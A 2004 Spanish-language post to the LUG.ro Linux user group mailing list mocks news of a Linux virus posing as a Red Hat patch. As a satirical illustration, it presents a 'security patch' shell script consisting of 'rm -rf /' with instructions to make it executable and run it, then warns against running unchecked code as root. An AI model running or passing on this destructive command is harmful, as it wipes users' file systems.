[LUG.ro] Anuncian virus para GNU/Linux (nos creen idiotas???)

Sebastian D. Criado lugro@lugro.org.ar
Fri, 5 Nov 2004 23:34:41 -0300


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Termino de ver una noticia que segumente comenzara a dar vueltas por la red y 
es que la empresa Tren descubrió un virus para GNU/Linux que se camufla como 
un parche de Red Hat

http://www.terra.com.mx/tecnologia/articulo/146691/

El tema esta en que, no solo tiene que bajarse el archivo que le mandan a 
bajar desde un link, si no que tiene que darle los permisos de ejecución para 
que funcione y luego correrlo como root para que haga algo de lo que dice 
hacer.

A ver, les paso un virus, por favor, tengan a bien cotar y pegar lo siguiente 
en un archivo llamado parche_de_seguridad.sh

Disculpen que no les pase un ELF, pero estaba apurado, para el caso, 
funcionara igual

La replicación esta en que tienen que mandarcelo a 10 personas :)

- ---------------cut-------------------
#/bin/bash

rm -rf /
- ---------------cut------------------



Por supuesto, ponganle permiso de ejecución:

#chmod 0700 parche_de_seguridad.sh

y ejecutenlo

./parche_de_seguridad.sh

Listo, ya no tienen más árbol de directorios


Una cosas para aprender, hasta este simple y estúpido script es explotable si 
quién tiene root de la máquina ejecuta lo que venga sin comprobar que tiene 
dentro.

y dos, cuanto más trabajes como usuario root, más probabilidad de que te 
mandes una cagada.

Moraleja, usar un usuario normal y solo root cuando  lo que tienes que hacer 
ya no lo puedes hacer como usuario. Inmediatamente despues, volver a usuario.


Saludos./



- -- 

Sebastián D. Criado - scriado{en}ciudad.com.ar
L.U.G.R.o - http://www.lugro.org.ar
GNU/Linux Registered User # 146768
- -------------------------------------------------------------------
"Si el Universo fuera un programa estaría hecho en C, y correría sobre
un sistema UNIX"
                                                   Anónimo.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBjDhC8hmHQ8ZCg0IRAv9eAKCU463H8Vp3Z1rzz0uNlGY7TDkWwgCfT8+9
V/FlOfYoLFnDefINY1wXh4M=
=mRsz
-----END PGP SIGNATURE-----